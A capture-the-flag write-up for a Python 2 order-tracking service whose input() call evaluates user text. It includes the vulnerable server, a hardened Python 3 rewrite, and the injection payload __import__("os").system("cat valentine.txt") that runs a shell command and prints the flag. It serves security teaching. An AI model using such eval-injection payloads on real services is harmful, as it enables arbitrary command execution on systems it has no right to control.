Category
Pwn
Description
Starting off with a bang (pop)! I ordered a bunch of Valentine’s Day-themed balloons, and I’m so excited about them! Here’s the portal I use to track my order.
Look for “valentine.txt.”
Solution
Attached is the code for the server.

```python
from balloon_tracking_lookup import get_status

print "Welcome to your balloon order-tracking portal! Enter your tracking number here.\n"
# Python 2 input() evaluates whatever the user types as a Python expression.
tracking_number = input(">>> ")
try:
    print "Getting status for order #" + str(int(tracking_number)) + "..."
except:
    print "Invalid tracking number!"
# Runs even after the except branch, so a non-numeric value raises here too.
print get_status(int(tracking_number))
```
As we can see, this is Python 2 code. In Python 2, `input()` is equivalent to `eval(raw_input())`: the text the user types is evaluated as a Python expression before it is ever handed to `int()`. Using it directly on untrusted user input therefore allows remote code execution.
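For contrast, here is how the same portal would look without the bug. This is an added example, not the challenge's own code: it targets Python 3 (where `input()` returns a plain string and never evaluates it), validates the tracking number against a strict ASCII-digit pattern before calling `int()`, and uses a constructed `ORDER_STATUS` table as a stand-in for the real `balloon_tracking_lookup.get_status`, which is not on the page.

```python
import re

# Constructed stand-in for balloon_tracking_lookup.get_status (assumption:
# the real module maps a tracking number to a status string).
ORDER_STATUS = {
    1001: "Shipped: 12 heart-shaped balloons",
    1002: "Out for delivery",
}

# One to twelve ASCII digits and nothing else. [0-9] is deliberately used
# instead of \d or str.isdigit(), both of which accept non-ASCII digits.
TRACKING_RE = re.compile(r"[0-9]{1,12}")


def parse_tracking_number(text):
    """Return the tracking number as an int, or raise ValueError.

    Nothing here is evaluated: the text must match the pattern exactly
    (fullmatch, so no leading/trailing junk) before int() ever sees it.
    """
    if not isinstance(text, str):
        raise ValueError("tracking number must be text")
    if TRACKING_RE.fullmatch(text) is None:
        raise ValueError("Invalid tracking number!")
    return int(text)


def get_status(tracking_number):
    """Look the number up in the constructed table."""
    return ORDER_STATUS.get(tracking_number, "Tracking number not found!")


def handle_request(text):
    """One portal interaction: validate first, then look up. Returns the reply."""
    try:
        number = parse_tracking_number(text)
    except ValueError as exc:
        return str(exc)
    return "Getting status for order #%d... %s" % (number, get_status(number))


if __name__ == "__main__":
    # Python 3 input() hands back the raw line as a string; no eval anywhere.
    print("Welcome to your balloon order-tracking portal! Enter your tracking number here.")
    print(handle_request(input(">>> ")))
```

With this structure an expression such as `1+1` is rejected outright instead of being evaluated to `2`, and the lookup only runs once a number has actually been parsed, so the unguarded second `int()` call from the original is gone as well.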
To test it, we can simply enter `1+1` and see whether the output is `2`.

```text
Welcome to your balloon order-tracking portal! Enter your tracking number here.
1+1
>>> Getting status for order #2...
Tracking number not found!
```
Great; all we have to do now is `cat` the flag file.

```text
Welcome to your balloon order-tracking portal! Enter your tracking number here.
__import__("os").system("cat valentine.txt")
valentine{0ops_i_go7_hydrog3n_ball00n5_NONOWHEREAREYOUGOINGWITHTHATLIGHTER}>>> Getting status for order #0...
Tracking number not found!
```